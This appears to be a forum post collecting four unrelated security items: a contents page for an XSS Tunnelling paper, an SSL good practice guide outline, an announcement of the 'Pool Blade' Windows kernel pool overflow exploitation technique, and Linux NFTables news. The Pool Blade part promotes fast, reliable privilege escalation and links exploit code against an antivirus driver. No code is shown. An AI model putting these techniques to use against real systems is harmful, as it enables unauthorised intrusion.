XSS Tunnelling Tunnelling HTTP traffic through XSS Channels Ferruh Mavituna www.portcullis-security.com XSS Tunnelling ................................................................................................................1 About XSS Tunnelling..................................................................................................1 What Is An XSS Channel?........................................................................................... 2 How Does XSS Shell Work?........................................................................................ 2 Points of Interest ..................................................................................................... 4 Why Is It Better Than The Classic XSS Attacks?.................................................... 5 What Is XSS Tunnelling?................................................................................................ 5 What Is An XSS Tunnel? ................................................................................................ 5 Why Tunnel HTTP Traffic Through An XSS Channel? ................................................. 6 Benefits Of XSS Tunnelling............................................................................................ 7 How Does XSS Tunnel Work?........................................................................................8 An Attack Process ....................................................................................................... 9 Download: http://labs.portcullis.co.uk/download/XSS-Tunnelling.pdf

SSL GOOD PRACTICE GUIDE VERSION: 1.0 DATE: 20/09/2013 TASK NUMBER: SSL_Whitepaper PREPARED BY Mike W. Emery Researcher Portcullis Computer Security Limited The Grange Barn, Pike's End Pinner, Middlesex HA5 2EX United Kingdom CONTENTS 1 INTRODUCTION 2 SSL BASICS 3 RECOMMENDATIONS 4 AREAS OF CONCERN 5 SAMPLE IMPLEMENTATIONS APPENDIX A: ABOUT PORTCULLIS COMPUTER SECURITY LIMITED 15 Download: http://labs.portcullis.co.uk/download/SSLGPG.pdf

Pool Blade: A new approach for kernel pool exploitation Abstract In recent years many methods have been discussed regarding exploitation of pool overflow corruptions. Most of these methods are based on the architecture of Pool manager in windows. In this paper I am going to discuss a generic method that is based on kernel objects and not the pool manager and because of the nature of this technic it is possible to exploit pool overflow vulnerabilities easier and more reliable. So I Introduce Pool Blade helper class that let us exploit pool overflow in a very short time by just calling some interface and triggering the vulnerability. Pool blade and the technic discussed here is just supported by windows XP/2003/vista but it can be extended to support more recent windows operating systems. Q: Why Pool blade? A: Because this method is fast and reliable Q: How much reliable? A: By this technic we don’t corrupt anything so the exploit works 100% Q: Fast? A: You have a pool overflow, you can exploit it in 5 minutes by just knowing size the vulnerable buffer Q: What is the impact? A: Everyone can exploit local pool overflows on windows easily and reliably to get escalated privilege. Q: What PoolBlade is not? A: It cannot be used to exploit pool overflow on windows 7 and for small buffer sizes you should find another proper objects. And of course it can be used only in Non-paged pool. Q: How it can be used? A: You can use the PoolBlade helper class or read the document and implement more customized version for your own purpose. The method and the helper class is demonstrated by an antivirus driver vulnerability in the following research paper . White-paper : PoolBlade Exploit-code: AhnlabV3MedCoreD Video : The demonstrated vulnerability is about the Ahnlab V3 internet security product. Of course the vulnerability is reported to vendor a few month ago. Final note : as you may know our windows exploitation course which contain kernel exploitation is just released if you like you can take it now ! Sursa: https://zdresearch.com/pool-blade-a-new-approach-for-kernel-pool-exploitation/

[h=1]NFTables IPTables-Replacement Queued For Linux 3.13[/h] [h=2]Posted by Michael Larabel on October 19, 2013[/h]NFTables is a new firewall subsystem / packet filtering engine for the Linux kernel that is poised to replace iptables. NFTables has been in development for several years by the upstream author of Netfilter. This new nftables system is set to be merged now into the Linux 3.13 kernel. NFTables has been in development for years and to replace IPTables by offering a simpler kernel ABI, reduce code duplication, improved error reporting, and provide more efficient support of filtering rules. Beyond IPTables, it also replaces the ip6tables, arptables, and ebtables frameworks but nftables does offer a compatibility layer to iptables support. For those into networking and wanting to learn more about NFTables, visit its Netfilter.org project page. Earlier this week a pull request was sent in for pulling in nf_tables for the next Linux kernel release through the net-next branch. The pull request was accepted and is now living in the net-next Git repository for Linux 3.13. IPTables won't die off in Linux 3.13 as there's still work ahead for NFTables, but those wanting to try out the new code when it's mainlined can find this how-to guide. Sursa: [Phoronix] NFTables IPTables-Replacement Queued For Linux 3.13